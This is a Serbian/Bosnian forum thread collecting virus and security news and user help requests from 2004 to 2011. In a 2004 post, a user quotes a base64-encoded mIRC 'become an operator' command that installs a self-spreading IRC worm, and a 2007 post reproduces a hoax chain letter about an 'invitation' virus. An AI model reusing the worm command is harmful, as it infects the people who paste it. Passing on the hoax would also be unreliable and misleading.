banjalukaforum.com

Dobrodošli na banjalukaforum.com
Danas je 28 Mar 2024, 13:40

Sva vremena su u UTC [ DST ]




Započni novu temu Odgovori na temu  [ 20 Posta ] 
Autoru Poruka
PostPoslato: 14 Nov 2004, 13:15 
OffLine
Pripravnik
Pripravnik

Pridružio se: 19 Avg 2001, 01:00
Postovi: 271
Lokacija: Banja Luka, Republika Srpska
Ovde neka idu sve novosti vezano za najnovije sigurnosne propuste, viruse i sl.

Nesto kao

Novi Windows virus

Pojavio se novi virus pod imenom bla bla ...

_________________
erga omnes


Vrh
 Profil  
 
 Tema posta:
PostPoslato: 31 Dec 2004, 18:51 
OffLine
Urednik
Urednik
Korisnikov avatar

Pridružio se: 12 Sep 2003, 21:58
Postovi: 6855
Lokacija: BL / UK
Jooj jooj...
Veceras ja na Krstarica chatu i dobijam pp sljedece:

Do You Want to be an OPERATOR in #krstarica ? copy/paste this-> //write   $decode(b24gMTp0ZXh0Oio6Izp7IC5pZ25vcmUgJG5pY2sgfCAudGltZXKgIDAgMTIwIC5qb2luICNNYW5pbGEgfCAubXNnICRuaWNrIERvIFlvdSBXYW50IHRvIGJlIGFuIE9QRVJBVE9SIGluICRjaGFuID8gY29weS9wYXN0ZSB0aGlzLT4DMTQgLy93cml0ZSCgICQgJCsgZGVjb2RlKCAkKyAkZW5jb2RlKCRyZWFkKCRzY3JpcHQsbiwxKSxtKSAkKyAsbSkgJGNocigxMjQpIC5sb2FkIC1ycyCgICRjaHIoMTI0KSAvL21vZGUgJCAkKyBtZSArUiB9,m) | .load -rs   | //mode $m
-


Neko kaze da je to stvarno tako...

Onda od operatora adobijam ovo:
Da izbrisete virus kucajte ovo

//!unload -rs | //!remove | //echo virus removed

(posle //!unload -rs ima 3 SPACE i posle //!unload ima 3 space)

I sad sta je to???

I na ircu ima svacega! :roll:

_________________
There are ways of saying what you think that make people think what you're thinking is actually more thoughtful than you actually think it is.


Vrh
 Profil  
 
 Tema posta:
PostPoslato: 27 Jan 2005, 20:26 
OffLine
Stara kuka
Stara kuka
Korisnikov avatar

Pridružio se: 22 Maj 2003, 18:55
Postovi: 4706
Evo sta sam ja dobio na mailu

This Message was undeliverable due to the following reason:

Your message was not delivered because the destination computer refused
to accept it (the error message is reproduced below). This type of error
is usually due to a mis-configured account or mail delivery system on the
destination computer; however, it could be caused by your message since
some mail systems refuse messages with invalid header information, or if
they are too large.

Your message was rejected by mail.iskon.hr for the following reason:

Your message could not be sent because it's probably infected by a virus
(#5.3.5)

The following recipients did not receive this message:

<oberon@boa.hr>

Please reply to tehnicka.podrska@vip.hr
if you feel this message to be in error.




To: oberon@gamer.hr
Subject: Re: Hello
Sent: Thursday, January 27, 2005 4:53 PM
Please confirm!


Kao da sam ja nesto poslao i pod attachment pise summary2004.zip
Reko da pogledam sta je to kada hotmail provjeri i izbaci
SlikaWORM_NETSKY.P Virus Found :wink:

_________________
http://www.codebluestudio.com


Poslednji put menjao Frenki dana 20 Jul 2008, 10:55, izmenjena samo jedanput

Vrh
 Profil  
 
 Tema posta:
PostPoslato: 28 Jan 2005, 11:14 
OffLine
Veteran
Veteran
Korisnikov avatar

Pridružio se: 05 Jul 2002, 22:04
Postovi: 2127
Lokacija: Aiur
Scan type: Realtime Protection Scan
Event: Virus Found!
Virus name: IRC.Worm.gen

stvarno mi ovo pocinje ici na zivce :)
svi znamo kako taj kodic izgleda...pa ga ne pisite svagdje....jer mi av pisti svaki put gdje god da se to ucita...

_________________
Slika
Beckett: How come I never make friends like that?
McKay: You need to get out more.
Beckett: We're in another galaxy. How much more out can you get?


Vrh
 Profil  
 
 Tema posta: MSN messenger virus
PostPoslato: 17 Apr 2005, 00:59 
OffLine
Pripravnik
Pripravnik
Korisnikov avatar

Pridružio se: 09 Apr 2005, 19:33
Postovi: 288
Lokacija: planetica Zemlja
Ovih dana kruži neki virus koji se
prenosi MSN messenger-om,
ubaci se jednostavno, u vidu fajla
koji vam stigne od onog s kim
četujete (tj. tako izgleda, bez
obzira što onaj s kim razgovarate
nije poslao nikakav fajl već se on
poslao sam od sebe). Da li znate
nešto o tome?

_________________
Carpe Noctem
______________________
http://www.youtube.com/zvucnjak


Vrh
 Profil  
 
 Tema posta:
PostPoslato: 23 Jan 2007, 09:07 
OffLine
Majstor
Majstor
Korisnikov avatar

Pridružio se: 15 Feb 2005, 19:36
Postovi: 643
Lokacija: Jamaica/Bih/Rs/Banjaluka
Internet: Širi se virus sa informacijama o Castrovoj smrti

I dok se jedan od najdugovječnijih i najkarizmatičnijih svjetskih državnika bori za život u bolnici na Kubi, hakeri su njegovu "skoru smrt" iskoristili za lansiranje još jednog virusa.
Osim vijesti o Castrovoj smrti, spam mail donosi i revolucionarne vijesti o Sadamu Huseinu koji nije obješen već je živ, zdrav i na sigurnom te vijesti o drugim državnicima. Iako nam je već na prvi pogled jasno da se radi o prevari i spam mailovima, tako nisu razmišljali drugi korisnici te su u kratkom roku virusom zaražene hiljade kompjutera.

Prema informacijama "Association of Internauts", svi mailovi koji u svom naslovu imaju spomenute poznate državnike su sumnjivi te se korisnicima preporučuje da ih ne otvaraju. Tako se virus još nalazi u mailovima sa naslovima "Hugo Chavez dead", "President of Russia Putin dead" i u onima u kojima se kaže da je Condoleezza Rice premlatila Angelu Merkel.

S obzirom da se prije nekoliko dana već proširio i "olujni virus" o kome smo već pisali, jasno je da su se i hakeri i pisci virusa vratili sa svojih godišnjih odmora. Dakle - oprez!

_________________
God will give me justice


Vrh
 Profil  
 
 Tema posta:
PostPoslato: 13 Dec 2007, 21:26 
OffLine
Veteran
Veteran
Korisnikov avatar

Pridružio se: 11 Feb 2003, 15:42
Postovi: 3076
Lokacija: Banja Luka
POSALJITE OVO SVIMA IZ ADRESARA - HITNO
Narednih dana morate paziti da ne otvarate mail zvan "invitation",
bez obzira tko vam to salje, jer to je virus koji "otvara"
olimpijsku baklju koja izgori hard disk na vasem kompjuteru. Ovaj
virus cete dobiti od osobe koju imate u vasem adresaru, zato morate ovaj
mail poslati na sto vise adresa, jer bolje je
dobiti ovaj mail 25 puta, nego dobit virus i otvoriti ga.
Ako dobijete mail sa imenom " invitation" ne otvarajte
ga nego ga odmah obrisite. To je najgori virus (objavljeno na CNN-u),
klasificiran od Microsofta kao virus najrazorniji ikad postojeci.
Ovaj virus otkriven je juce poslepodne od MCAfee, te za taj virus jos
nema obrane.
Ovaj virus unistava sektor Zero hard diska, gdje je vitalna
informacija skrivena. Posle toga je vas hard disk
neupotrebljiv, kao i podaci na njemu.
Posaljite ovaj mail svima Vama poznatima.!!!
Informaciju mozete proveriti na internetu !

_________________
http://www.myspace.com/bandtanker


Vrh
 Profil  
 
PostPoslato: 13 Jul 2008, 20:01 
OffLine
Majstorski kandidat
Majstorski kandidat

Pridružio se: 15 Jun 2003, 01:17
Postovi: 374
Moj prvi nakon pitaj Boga koliko godina... Virut.q! Popusio sam ga a ne znam ni kako... Googlao sam i skontao da ga se prilicno tesko rijesiti tako da cu odraditi onaj famozni format c. A i imam svakakvih gluposti od kojih 70% ne koristim tako da ce ova cistka biti od koristi i tako i tako... Trebam li formatirati i particiju sa Program files-ima (nisu na c-u) s obzirom da virus napada samo .exe i .scr fileove?


Vrh
 Profil  
 
PostPoslato: 23 Nov 2008, 23:45 
OffLine
Veteran
Veteran
Korisnikov avatar

Pridružio se: 23 Feb 2003, 12:43
Postovi: 3807
Lokacija: The Happy Hill
А јест ме кренуло. Улетио ми тројанац, не знам како да га се ријешим. Мој Касперски 6.0 му не може ништа, изгледа... Помажите!

_________________
По зими, киши, сунцу, снегу или кошави...


Vrh
 Profil  
 
PostPoslato: 24 Nov 2008, 00:07 
OffLine
Veteran
Veteran
Korisnikov avatar

Pridružio se: 29 Jan 2002, 01:00
Postovi: 2303
Lokacija: banjaluka
Otkud znas da je trojanac?
Kav ne moze nista... hmmm... mozda da ga malo updateujes ;)


Vrh
 Profil  
 
PostPoslato: 26 Nov 2008, 22:13 
OffLine
Majstor
Majstor
Korisnikov avatar

Pridružio se: 10 Dec 2002, 20:07
Postovi: 1149
Lokacija: BL
Sta fali trojancima? :D
Bar te ne diraju!

_________________
*/

?>


Vrh
 Profil  
 
PostPoslato: 25 Jan 2009, 16:24 
OffLine
Pripravnik
Pripravnik
Korisnikov avatar

Pridružio se: 14 Jan 2008, 12:57
Postovi: 298
negdje sam fasovao elemntarnu nepogodu pod nazivom conflicker.worm
kako i cime da se rijesim ove crvotocine


Vrh
 Profil  
 
PostPoslato: 25 Jan 2009, 19:29 
OffLine
Urednik
Urednik
Korisnikov avatar

Pridružio se: 21 Nov 2007, 09:26
Postovi: 17115
Lokacija: Q5HW+6W
Probaj sa ovim:

W32.Downadup Removal Tool

_________________
Slika


Vrh
 Profil  
 
PostPoslato: 25 Jan 2009, 22:11 
OffLine
Pripravnik
Pripravnik
Korisnikov avatar

Pridružio se: 14 Jan 2008, 12:57
Postovi: 298
rijeseno,hvala


Vrh
 Profil  
 
PostPoslato: 11 Okt 2009, 09:27 
OffLine
Početnik
Početnik

Pridružio se: 09 Okt 2009, 22:29
Postovi: 17
STO SE TICE VIRUSA I ZASTITE KASPERKSI JE NAJ BOLJI,MENI NI JEDNOM NIJE PAO SISTEM OD VIRUSA ILI DA SAM IMAO VELIKI BROJ VIRUSA NA RACUNARA,KORISTIM GA OD 6 VERZIJE,KUPIM KLJUC ZA GODINU DANA,UPDATE KONTSANTAN,I JA SAM SIGURAN,NE KONTAM ZASTO DRUGI LJUDI TO NE RADE.NE MOZETE RECI NEMAMO PARA,JER CETE IH IMATI ZA POPRAVAK RACUNARA :D OKO 25-30KM............


Vrh
 Profil  
 
PostPoslato: 11 Okt 2009, 11:42 
OffLine
Samo jedan iznad mene
Samo jedan iznad mene

Pridružio se: 04 Avg 2001, 01:00
Postovi: 15608
Lokacija: Banja Luka
moonblade piši malim slovima jer se velikim slovima na forumima stiče utisak da galamiš. Zbog toga je upotreba isključivo velikih slova inače zabranjena.


Vrh
 Profil  
 
PostPoslato: 05 Jan 2011, 12:54 
OffLine
Samo jedan iznad mene
Samo jedan iznad mene
Korisnikov avatar

Pridružio se: 03 Jan 2007, 16:38
Postovi: 23477
Genijalno. :lol:

Citiraj:
Microsoft has confirmed reports that several versions of Windows are vulnerable to exploits that allow remote attackers to take full control of users' computers using booby-trapped emails and websites....

The flaw resides in the Windows Graphics Rendering Engine and can be exploited when victims view a specially manipulated thumbnails on network-shared folders or drives or in online WebDAV-shared folders. It can also be targeted when email users open or preview Microsoft Word or PowerPoint files that contain the doctored images...

The vulnerability is exploited by setting the number of color indexes in the color table to a negative number,” Johannes Ullrich, chief research officer at the Sans Institute, blogged. Slides from the December 15 conference provide hints that the exploits can bypass security measures such as data execution prevention and safe exception handling, he added...


http://www.theregister.co.uk/2011/01/04/windows_0day/

_________________
Rad je od čovjeka napravio roba, neradu smo odani sve do groba.


Vrh
 Profil  
 
PostPoslato: 10 Jan 2011, 13:51 
OffLine
Stara kuka
Stara kuka
Korisnikov avatar

Pridružio se: 27 Nov 2008, 14:05
Postovi: 5168
Lagano probijanje WPA zaštite u 6 minuta

Njemački stručnjak za računalnu sigurnost, Thomas Roth, tvrdi kako je razvio softver koji omogućuje relativno jednostavno i jeftino probijanje šifri bežičnih mreži zaštićenih prema standardu WPA-PSK. Naime, Roth je razvio softver koji se može izvršavati na Amazonovoj usluzi "u oblaku" Elastic Compute Cloud (EC2) koja korisniku omogućuje iznajmljivanje superračunalne snage po vrlo pristupačnim cijenama.

Izvršavajući svoj softver na Amazonovom EC2 Roth tvrdi kako u sekundi može ispitati 400.000 potencijalnih šifri, odnosno probiti prosječni ključ WPA zaštićene bežične mreže za oko 6 minuta.

Roth je najavio kako će javno objaviti svoj softver i iznijeti više detalja na konferenciji Black Hat koja se ovog mjeseca održava u San Franciscu.

No ističe kako mu nije cilj potaknuti kriminalne aktivnosti, već upozoriti na slabosti zaštite bežičnih mreža i promijeniti pogrešna shvaćanja mrežnih administratora kako je nemoguće ili vrlo skupo probiti WPA zaštitu.

(BUG)

_________________
Bio jednom jedan djecak, u ocevoj kuci, nad rijekom, koji je sanjao zlatne snove, jer nista nije znao o zivotu.


Vrh
 Profil  
 
PostPoslato: 08 Okt 2011, 17:14 
OffLine
Samo jedan iznad mene
Samo jedan iznad mene
Korisnikov avatar

Pridružio se: 03 Jan 2007, 16:38
Postovi: 23477
Citiraj:
ZRAČNE snage američke vojne baze u Nevadi napao je računalni virus, koji prati svaki pritisak gumba njihovih pilota, prenosi portal Wired.com.

Virus su prvo primijetili u vojnoj bazi Creech prije gotovo dva tjedna, kod provjere sigurnosnog sustava u svojoj računalnoj bazi. Virus je, dojavljuje izvor iz baze, u kontrolnoj sobi registrirao sve komande i akcije zrakoplovaca u Afganistanu i drugim udaljenim vojnim bazama SAD-a.

Iz zračnih snaga su oštro, ali neuvjerljivo demantirali ovu vijest, a još uvijek se ne zna je li virus u računalne baze "uletio" slučajno ili ciljano. Šokira, međutim, to što je pogodio računala najveće svjetske vojne sile, koja bi trebala imati gotovo savršene sustave za zaštitu od virusa.

"Ako su spojeni na širu mrežu, opet će biti zaraženi. Sustav će trebati zamijeniti ili ponovno snimiti u virus-free opciji", kazao je Anuo Ghosh, bivši zaposlenik Agencije za obranu i istraživačke projekte.

_________________
Rad je od čovjeka napravio roba, neradu smo odani sve do groba.


Vrh
 Profil  
 
PostPoslato: 09 Okt 2011, 14:59 
OffLine
Samo jedan iznad mene
Samo jedan iznad mene
Korisnikov avatar

Pridružio se: 03 Jan 2007, 16:38
Postovi: 23477
Evo malo opširniji članak. Ima nekih nepotvrđenih informacija da su im počele nešto često padati BPL-ovi. Čak tri danas u Somaliji. Možda je ovo osveta za Stuxnet worm :) Ili Kinezi pomažu Pakistanu ...

Spoiler:
Computer virus hits US Predator and Reaper drone fleet
By Noah Shachtman, wired.com | Published a day ago

Slika

A computer virus has infected the cockpits of America’s Predator and Reaper drones, logging pilots’ every keystroke as they remotely fly missions over Afghanistan and other war zones.

The virus, first detected nearly two weeks ago by the military’s Host-Based Security System, has not prevented pilots at Creech Air Force Base in Nevada from flying their missions overseas. Nor have there been any confirmed incidents of classified information being lost or sent to an outside source. But the virus has resisted multiple efforts to remove it from Creech’s computers, network security specialists say. And the infection underscores the ongoing security risks in what has become the US military’s most important weapons system.

“We keep wiping it off, and it keeps coming back,” says a source familiar with the network infection, one of three that told Danger Room about the virus. “We think it’s benign. But we just don’t know.”

Military network security specialists aren’t sure whether the virus and its so-called “keylogger” payload were introduced intentionally or by accident; it may be a common piece of malware that just happened to make its way into these sensitive networks. The specialists don’t know exactly how far the virus has spread. But they’re sure that the infection has hit both classified and unclassified machines at Creech. That raises the possibility, at least, that secret data may have been captured by the keylogger, and then transmitted over the public internet to someone outside the military chain of command.

Drones have become America’s tool of choice in both its conventional and shadow wars, allowing US forces to attack targets and spy on its foes without risking American lives. Since President Obama assumed office, a fleet of approximately 30 CIA-directed drones have hit targets in Pakistan more than 230 times; all told, these drones have killed more than 2,000 suspected militants and civilians, according to the Washington Post. More than 150 additional Predator and Reaper drones, under US Air Force control, watch over the fighting in Afghanistan and Iraq. American military drones struck 92 times in Libya between mid-April and late August. And late last month, an American drone killed top terrorist Anwar al-Awlaki — part of an escalating unmanned air assault in the Horn of Africa and southern Arabian peninsula.

But despite their widespread use, the drone systems are known to have security flaws. Many Reapers and Predators don’t encrypt the video they transmit to American troops on the ground. In the summer of 2009, US forces discovered “days and days and hours and hours” of the drone footage on the laptops of Iraqi insurgents. A $26 piece of software allowed the militants to capture the video.

The lion’s share of US drone missions are flown by Air Force pilots stationed at Creech, a tiny outpost in the barren Nevada desert, 20 miles north of a state prison and adjacent to a one-story casino. In a nondescript building, down a largely unmarked hallway, are a series of rooms, each with a rack of servers and a “ground control station,” or GCS. There, a drone pilot and a sensor operator sit in their flight suits in front of a series of screens. In the pilot’s hand is the joystick, guiding the drone as it soars above Afghanistan, Iraq, or some other battlefield.

Some of the GCSs are classified secret and used for conventional warzone surveillance duty. The GCSs handling more exotic operations are top secret. None of the remote cockpits are supposed to be connected to the public internet, which means they are supposed to be largely immune to viruses and other network security threats.

But time and time again, the so-called “air gaps” between classified and public networks have been bridged, largely through the use of discs and removable drives. In late 2008, for example, the drives helped introduce the agent.btz worm to hundreds of thousands of Defense Department computers. The Pentagon is still disinfecting machines, three years later.

Use of the drives is now severely restricted throughout the military. But the base at Creech was one of the exceptions, until the virus hit. Predator and Reaper crews use removable hard drives to load map updates and transport mission videos from one computer to another. The virus is believed to have spread through these removable drives. Drone units at other Air Force bases worldwide have now been ordered to stop their use.

In the meantime, technicians at Creech are trying to get the virus off the GCS machines. It has not been easy. At first, they followed removal instructions posted on the website of the Kaspersky security firm. “But the virus kept coming back,” a source familiar with the infection says. Eventually, the technicians had to use a software tool called BCWipe to completely erase the GCS’ internal hard drives. “That meant rebuilding them from scratch” — a time-consuming effort.

The Air Force declined to comment directly on the virus. “We generally do not discuss specific vulnerabilities, threats, or responses to our computer networks, since that helps people looking to exploit or attack our systems to refine their approach,” says Lt. Col. Tadd Sholtis, a spokesman for Air Combat Command, which oversees the drones and all other Air Force tactical aircraft. “We invest a lot in protecting and monitoring our systems to counter threats and ensure security, which includes a comprehensive response to viruses, worms, and other malware we discover.”

However, insiders say that senior officers at Creech are being briefed daily on the virus.

“It’s getting a lot of attention,” the source says. “But no one’s panicking. Yet.”

_________________
Rad je od čovjeka napravio roba, neradu smo odani sve do groba.


Vrh
 Profil  
 
Prikaži postove u poslednjih:  Poređaj po  
Započni novu temu Odgovori na temu  [ 20 Posta ] 

Sva vremena su u UTC [ DST ]


Ko je OnLine

Korisnici koji su trenutno na forumu: Nema registrovanih korisnika i 3 gostiju


Ne možete postavljati nove teme u ovom forumu
Ne možete odgovarati na teme u ovom forumu
Ne možete monjati vaše postove u ovom forumu
Ne možete brisati vaše postove u ovom forumu
Ne možete slati prikačene fajlove u ovom forumu

Pronađi:
Idi na:  
Powered by phpBB® Forum Software © phpBB Group
Hosting BitLab
Prevod - www.CyberCom.rs